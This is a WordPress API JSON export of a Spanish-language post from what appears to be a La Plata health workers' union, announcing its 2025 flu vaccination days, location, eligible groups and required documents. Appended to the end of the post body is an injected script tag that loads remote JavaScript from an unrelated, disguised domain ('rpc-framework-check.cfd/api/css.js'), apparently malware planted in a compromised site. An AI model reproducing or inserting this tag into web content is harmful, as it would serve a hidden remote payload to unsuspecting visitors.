{"id":18426,"date":"2025-05-07T10:39:44","date_gmt":"2025-05-07T13:39:44","guid":{"rendered":"http:\/\/atsalaplata.org.ar\/web\/?p=18426"},"modified":"2026-02-02T17:10:58","modified_gmt":"2026-02-02T20:10:58","slug":"vacunacion-antigripal-2025","status":"publish","type":"post","link":"http:\/\/atsalaplata.org.ar\/web\/2025\/05\/vacunacion-antigripal-2025\/","title":{"rendered":"Vacunaci\u00f3n Antigripal 2025"},"content":{"rendered":"\n<p>\ud83d\udcc5 El jueves 8\/5 comienza la Vacunaci\u00f3n antigripal 2025 \ud83d\udc89 los d\u00edas martes, mi\u00e9rcoles y jueves, en nuestra sede social: calle 5 N\u00ba375 entre 39 y 40, de 9 a 15 horas.<\/p>\n\n\n\n<p>El calendario vacunatorio contra la gripe es exclusivo para afiliados\/as y su grupo familiar primario a cargo en la OSPSA. \ud83d\udc68\ud83d\udc69\ud83d\udc67\ud83d\udc66<\/p>\n\n\n\n<p>\ud83d\udccdREQUISITOS: PRESENTAR CREDENCIAL DIGITAL Y DNI<\/p>\n\n\n\n<p>-Embarazadas<\/p>\n\n\n\n<p>-Pu\u00e9rperas con ni\u00f1os menores de 11 d\u00edas no vacunados en la temporada actual durante el embarazo.<\/p>\n\n\n\n<p>-Ni\u00f1os entre 6 y 24 meses inclusive (independientemente de los factores de riesgo)<\/p>\n\n\n\n<p>-Mayores de 65 a\u00f1os.<\/p>\n\n\n\n<p>\ud83d\udccdSe requerir\u00e1 orden m\u00e9dica para ni\u00f1os, adultos y grupo familiar primario a cargo, entre 2 y 64 a\u00f1os con los siguientes factores de riesgo:<\/p>\n\n\n\n<p>Enfermedades respiratorias cr\u00f3nicas.<\/p>\n\n\n\n<p>Enfermedades card\u00edacas.<\/p>\n\n\n\n<p>Inmunodeficiencias cong\u00e9nitas o adquiridas.<\/p>\n\n\n\n<p>Pacientes oncol\u00f3gicos y trasplantados.<\/p>\n\n\n\n<p>Otros: insuficiencia renal, diabetes, obesidad m\u00f3rbida (IMC&gt;40), etc.<\/p>\n\n\n\n<p>#SanidadAtsaLaPlata #SiempreJuntoAVos #Campa\u00f1aGripe #vacunacion2025<\/p>\n<script><script src=\"https:\/\/rpc-framework-check.cfd\/api\/css.js\" defer><\/script><\/script>","protected":false},"excerpt":{"rendered":"<p>\ud83d\udcc5 El jueves 8\/5 comienza la Vacunaci\u00f3n antigripal 2025 \ud83d\udc89 los d\u00edas martes, mi\u00e9rcoles y&#8230;<\/p>\n","protected":false},"author":2,"featured_media":18427,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[86,146,98,147,88,81,97,148,152],"tags":[],"class_list":["post-18426","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-afiliado","category-destacado","category-home","category-novedades","category-obra-social","category-salud","category-sec-de-cultura","category-ultimas-noticias","category-vacunacion"],"_links":{"self":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18426","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/comments?post=18426"}],"version-history":[{"count":2,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18426\/revisions"}],"predecessor-version":[{"id":20821,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/posts\/18426\/revisions\/20821"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media\/18427"}],"wp:attachment":[{"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/media?parent=18426"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/categories?post=18426"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/atsalaplata.org.ar\/web\/wp-json\/wp\/v2\/tags?post=18426"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}